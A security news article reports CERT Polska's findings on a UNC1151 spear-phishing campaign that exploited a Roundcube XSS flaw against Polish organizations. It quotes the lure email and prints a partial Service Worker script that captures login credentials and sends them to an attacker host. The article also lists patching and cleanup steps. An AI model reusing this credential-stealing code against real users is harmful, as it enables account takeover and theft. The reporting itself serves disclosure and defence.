UNC1151 Exploits Roundcube Flaw in Spear Phishing Attack

CERT Polska has sounded the alarm after uncovering a spear phishing campaign that targeted Polish organizations using a critical webmail vulnerability. The campaign is linked to the UNC1151 APT group, previously tied to Belarusian and Russian intelligence services, and marks the first recorded use of CVE-2024-42009 by the group.

The attack capitalized on a cross-site scripting (XSS) vulnerability in the popular webmail client Roundcube. The flaw, CVE-2024-42009, allows attackers to inject arbitrary JavaScript into a victim’s browser simply by opening a malicious email, requiring no additional user interaction.

“The worst possible result of running untrusted code is a complete compromise of users session and/or credentials,” CERT Polska warns.

The malicious message appeared to be a benign request:

Subject: [!IMPORTANT] Invoice to reservation number: S2500650676

Good day,
Please issue an invoice for the attached ticket with reservation Ref. No. S2500650676 dated 25.04.2025
Invoice details:
[REDACTED] Sp. z o. o. z o. o.
ul. [REDACTED]
72-602 Świnoujście, Poland
NIP: PL [REDACTED]
Thank you for your cooperation.
--
[REDACTED]
Administrative Manager, Proxy

But hidden within the HTML structure of the email was obfuscated JavaScript that initiated the exploit.

Once opened, the email triggers a script that installs a Service Worker in the victim’s browser—a powerful web feature that allows background tasks and request interception.

“After successfully installing the Service Worker in a victim’s browser, the user is then redirected to the legitimate webmail login page of their organization,” the advisory explains.

The Service Worker then executes a credential-stealing script by intercepting POST requests sent during a legitimate login process:

self.addEventListener('fetch', event => {
  (...)
  if (req.method === 'POST') {
    const cloned = req.clone();
    cloned.text().then(bodyText => {
      const params = new URLSearchParams(bodyText);
      const user = params.get('username') || params.get('_user');
      const pass = params.get('password') || params.get('_pass');

        fetch('https://a.mpk-krakow.pl/creds', {
          body: JSON.stringify({
            login: user,
            password: pass,
            (...)

Stolen credentials are quietly exfiltrated to attacker-controlled infrastructure, while the user remains unaware.

This operation is attributed with high confidence to UNC1151, a threat cluster previously linked to Belarusian military intelligence (APT). Reports by Mandiant and Google have long associated UNC1151 with psychological operations and cyberespionage in Eastern Europe.

“According to publications by Mandiant and Google, UNC1151 is associated with the Belarusian government while other sources connect it with Russian intelligence services.”

Once credentials were harvested, attackers accessed mailboxes, exfiltrated address books, and in some cases, used compromised accounts to propagate further phishing.

Although not exploited in this campaign, CERT Polska warns of a new vulnerability in Roundcube, CVE-2025-49113, disclosed the last week. It could enable remote code execution when chained with the XSS-based credential theft—raising the stakes for any unpatched server.

“It could be combined with an account compromise vulnerability to form a highly effective attack chain.”

Organizations using Roundcube are urged to take immediate action:

• Update Roundcube to version 1.6.11 or 1.5.10
• Audit logs for connections to a.mpk-krakow[.]pl
• Unregister malicious Service Workers via browser developer tools
• Enforce password resets for potentially compromised users

Related Posts:

• UNC1151 Escalates Cyber Warfare: Attacks Target Ukrainian Defense Infrastructure
• Smartwares Security Breach: Vulnerabilities Expose Cameras to Remote Takeover
• Roundcube Webmail Releases Security Updates to Patch Multiple Vulnerabilities
• Critical RCE Flaw Patched in Roundcube Webmail: Update Immediately!